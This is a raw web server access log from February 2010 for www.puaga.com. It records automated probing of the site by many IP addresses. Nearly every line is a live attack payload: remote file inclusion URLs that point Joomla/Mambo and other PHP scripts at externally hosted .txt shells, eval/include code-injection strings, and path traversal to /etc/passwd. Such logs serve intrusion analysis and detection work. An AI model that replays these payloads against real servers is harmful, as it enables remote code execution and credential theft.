67.227.136.138 - - [24/Feb/2010:04:54:48 -0800] "GET /index.php?option=com_sitemap&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:04:55:02 -0800] "GET /logs/access_100123.log%20%20//components/com_pollxt/languages/english.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:04:55:08 -0800] "GET /logs/access.log%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:04:55:08 -0800] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:04:55:08 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:04:55:12 -0800] "GET /logs/access_100123.log%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [24/Feb/2010:04:55:17 -0800] "GET /logs/access_100217.log%20%20//index.php?option=com_sitemap&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:04:55:24 -0800] "GET /logs/access_100123.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:04:55:24 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:04:55:24 -0800] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:04:55:33 -0800] "GET /logs/access_100123.log%20%20//components/com_pollxt/languages/english.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:04:55:50 -0800] "GET /logs/access_100212.log%20%20/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:04:55:54 -0800] "GET /logs/access_100212.log%20%20/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:04:56:21 -0800] "GET /logs/access.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:04:56:30 -0800] "GET /logs/access_100212.log%20%20/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.153.127.155 - - [24/Feb/2010:04:56:58 -0800] "GET /toolbar.phpshop.html.php?mosConfig_absolute_path=http://togas.ru/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.puaga.com"
202.153.127.155 - - [24/Feb/2010:04:57:00 -0800] "GET /logs/toolbar.phpshop.html.php?mosConfig_absolute_path=http://togas.ru/test.txt??? HTTP/1.1" 404 5258 "-" "Microsoft Pocket Internet Explorer/0.6" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:04:57:21 -0800] "GET /logs/access_100212.log%20%20/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [24/Feb/2010:04:57:30 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.banjalukasport.com/ribolov/public_html//admin/install/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [24/Feb/2010:04:57:31 -0800] "GET /logs/access_100210.log%20%20//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.banjalukasport.com/ribolov/public_html//admin/install/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [24/Feb/2010:04:57:31 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.banjalukasport.com/ribolov/public_html//admin/install/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:04:58:05 -0800] "GET /logs/access_100125.log%20%20//components/com_pollxt/languages/english.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [24/Feb/2010:04:58:08 -0800] "GET /logs/access_100125.log%20%20//components/com_pollxt/languages/english.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.15 - - [24/Feb/2010:04:58:27 -0800] "GET /%20/theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
74.50.85.15 - - [24/Feb/2010:04:58:29 -0800] "GET /%20/theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=./../../../../../../../../etc/passwd HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
210.205.6.233 - - [24/Feb/2010:04:58:31 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.banjalukasport.com/ribolov/public_html//admin/install/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [24/Feb/2010:04:58:31 -0800] "GET /logs/access_100210.log%20%20//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.banjalukasport.com/ribolov/public_html//admin/install/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [24/Feb/2010:04:58:31 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.banjalukasport.com/ribolov/public_html//admin/install/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [24/Feb/2010:04:58:31 -0800] "GET /logs/access_100206.log%20%20//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.banjalukasport.com/ribolov/public_html//admin/install/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.244.236.248 - - [24/Feb/2010:04:58:51 -0800] "GET /logs/access_100123.log//index.php?option=com_sitemap&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.244.236.248 - - [24/Feb/2010:04:59:33 -0800] "GET /logs/access_100217.log//index.php?option=com_sitemap&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:05:01:21 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:05:01:21 -0800] "GET /logs/access_100202.log%20%20/akocomments.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:05:01:21 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [24/Feb/2010:05:01:48 -0800] "GET /logs/access_100206.log%20%20//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.banjalukasport.com/ribolov/public_html//admin/install/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.214.60 - - [24/Feb/2010:05:01:50 -0800] "GET /logs//component/option,com_newsfeeds/index.php?option=com_newsfeeds&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.214.60 - - [24/Feb/2010:05:01:51 -0800] "GET /logs/access_100214.log//component/option,com_newsfeeds/index.php?option=com_newsfeeds&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.214.60 - - [24/Feb/2010:05:01:57 -0800] "GET /component/option,com_newsfeeds/index.php?option=com_newsfeeds&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.214.60 - - [24/Feb/2010:05:02:57 -0800] "GET /logs//component/option,com_newsfeeds/index.php?option=com_newsfeeds&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.214.60 - - [24/Feb/2010:05:02:57 -0800] "GET /logs/access_100214.log//component/option,com_newsfeeds/index.php?option=com_newsfeeds&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.214.60 - - [24/Feb/2010:05:02:57 -0800] "GET /component/option,com_newsfeeds/index.php?option=com_newsfeeds&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [24/Feb/2010:05:03:12 -0800] "GET /logs/access_100217.log%20%20/toolbar.phpshop.html.php?mosConfig_absolute_path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [24/Feb/2010:05:03:12 -0800] "GET /logs/toolbar.phpshop.html.php?mosConfig_absolute_path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [24/Feb/2010:05:03:12 -0800] "GET /toolbar.phpshop.html.php?mosConfig_absolute_path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [24/Feb/2010:05:03:12 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [24/Feb/2010:05:03:12 -0800] "GET /logs/access_100125.log%20%20/akocomments.php?mosConfig_absolute_path=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [24/Feb/2010:05:03:12 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [24/Feb/2010:05:03:21 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [24/Feb/2010:05:03:21 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [24/Feb/2010:05:03:21 -0800] "GET /logs/access_100125.log%20%20/akocomments.php?mosConfig_absolute_path=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [24/Feb/2010:05:03:41 -0800] "GET /logs/access_100202.log%20%20/akocomments.php?mosConfig_absolute_path=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [24/Feb/2010:05:03:46 -0800] "GET /logs/access_100202.log%20%20/akocomments.php?mosConfig_absolute_path=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.172.26 - - [24/Feb/2010:05:05:03 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [24/Feb/2010:05:05:08 -0800] "GET /logs/access_100123.log//index.php?option=com_sitemap&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.172.26 - - [24/Feb/2010:05:05:14 -0800] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.172.26 - - [24/Feb/2010:05:05:14 -0800] "GET /logs/access_100209.log%20%20//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [24/Feb/2010:05:05:20 -0800] "GET /logs/access_100217.log//index.php?option=com_sitemap&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.172.26 - - [24/Feb/2010:05:05:34 -0800] "GET /logs/access_100121.log%20%20//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.172.26 - - [24/Feb/2010:05:05:35 -0800] "GET /logs/access_100209.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.172.26 - - [24/Feb/2010:05:05:37 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.172.26 - - [24/Feb/2010:05:05:48 -0800] "GET /logs/access_100121.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [24/Feb/2010:05:05:55 -0800] "GET /logs/access_100130.log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [24/Feb/2010:05:05:55 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [24/Feb/2010:05:05:55 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.172.26 - - [24/Feb/2010:05:06:11 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://cyber-cigarette.fr//components/com_virtuemart/idxx.txt?? HTTP/1.1" 200 4950 "-" "Mozilla/5.0" "www.puaga.com"
189.108.172.26 - - [24/Feb/2010:05:06:11 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://cyber-cigarette.fr//components/com_virtuemart/idxx.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
189.108.172.26 - - [24/Feb/2010:05:06:17 -0800] "GET /logs/access_100201.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://cyber-cigarette.fr//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.172.26 - - [24/Feb/2010:05:06:24 -0800] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.172.26 - - [24/Feb/2010:05:06:24 -0800] "GET /logs/access_100209.log%20%20//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.172.26 - - [24/Feb/2010:05:06:24 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [24/Feb/2010:05:06:47 -0800] "GET /logs/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [24/Feb/2010:05:06:47 -0800] "GET /logs/access_100217.log%20%20/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [24/Feb/2010:05:06:47 -0800] "GET /toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.172.26 - - [24/Feb/2010:05:06:49 -0800] "GET /logs/access_100121.log%20%20//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [24/Feb/2010:05:06:54 -0800] "GET /logs/access_091220.log///admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [24/Feb/2010:05:06:55 -0800] "GET //admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [24/Feb/2010:05:06:55 -0800] "GET /logs///admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.15 - - [24/Feb/2010:05:07:47 -0800] "GET /%20/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
74.50.85.15 - - [24/Feb/2010:05:07:49 -0800] "GET /%20/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=./../../../../../../../../etc/passwd HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
89.36.175.10 - - [24/Feb/2010:05:07:53 -0800] "GET /logs/access_100130.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [24/Feb/2010:05:07:53 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [24/Feb/2010:05:07:53 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:05:08:28 -0800] "GET /logs/access_100203.log%20%20//delete_all.php?board_skin_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:05:08:28 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:05:08:28 -0800] "GET /delete_all.php?board_skin_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [24/Feb/2010:05:08:33 -0800] "GET /logs/access_100119.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [24/Feb/2010:05:08:34 -0800] "GET /delete_all.php?board_skin_path=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [24/Feb/2010:05:08:34 -0800] "GET /logs//delete_all.php?board_skin_path=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [24/Feb/2010:05:08:34 -0800] "GET /logs/access_100205.log//delete_all.php?board_skin_path=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [24/Feb/2010:05:08:40 -0800] "GET /logs/access_100203.log//delete_all.php?board_skin_path=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [24/Feb/2010:05:08:42 -0800] "GET /delete_all.php?board_skin_path=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [24/Feb/2010:05:08:43 -0800] "GET /logs//delete_all.php?board_skin_path=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [24/Feb/2010:05:08:43 -0800] "GET /logs/access_100205.log//delete_all.php?board_skin_path=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [24/Feb/2010:05:08:53 -0800] "GET /logs/access_100203.log//delete_all.php?board_skin_path=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.172.26 - - [24/Feb/2010:05:09:06 -0800] "GET /logs/access_100130.log%20%20//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.214.60 - - [24/Feb/2010:05:09:18 -0800] "GET /component/option,com_newsfeeds/index.php?option=com_newsfeeds&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:05:09:21 -0800] "GET /logs/access_100122.log%20%20//delete_all.php?board_skin_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.214.60 - - [24/Feb/2010:05:09:25 -0800] "GET /logs//component/option,com_newsfeeds/index.php?option=com_newsfeeds&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.214.60 - - [24/Feb/2010:05:09:25 -0800] "GET /logs/access_100214.log//component/option,com_newsfeeds/index.php?option=com_newsfeeds&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.172.26 - - [24/Feb/2010:05:09:29 -0800] "GET /logs/access_100201.log/////?_SERVER[DOCUMENT_ROOT]=http://cyber-cigarette.fr//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.172.26 - - [24/Feb/2010:05:09:30 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://cyber-cigarette.fr//components/com_virtuemart/idxx.txt?? HTTP/1.1" 200 4950 "-" "Mozilla/5.0" "www.puaga.com"
189.108.172.26 - - [24/Feb/2010:05:09:35 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://cyber-cigarette.fr//components/com_virtuemart/idxx.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [24/Feb/2010:05:09:37 -0800] "GET /logs//delete_all.php?board_skin_path=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [24/Feb/2010:05:09:38 -0800] "GET /logs/access_100205.log//delete_all.php?board_skin_path=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [24/Feb/2010:05:09:39 -0800] "GET /delete_all.php?board_skin_path=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
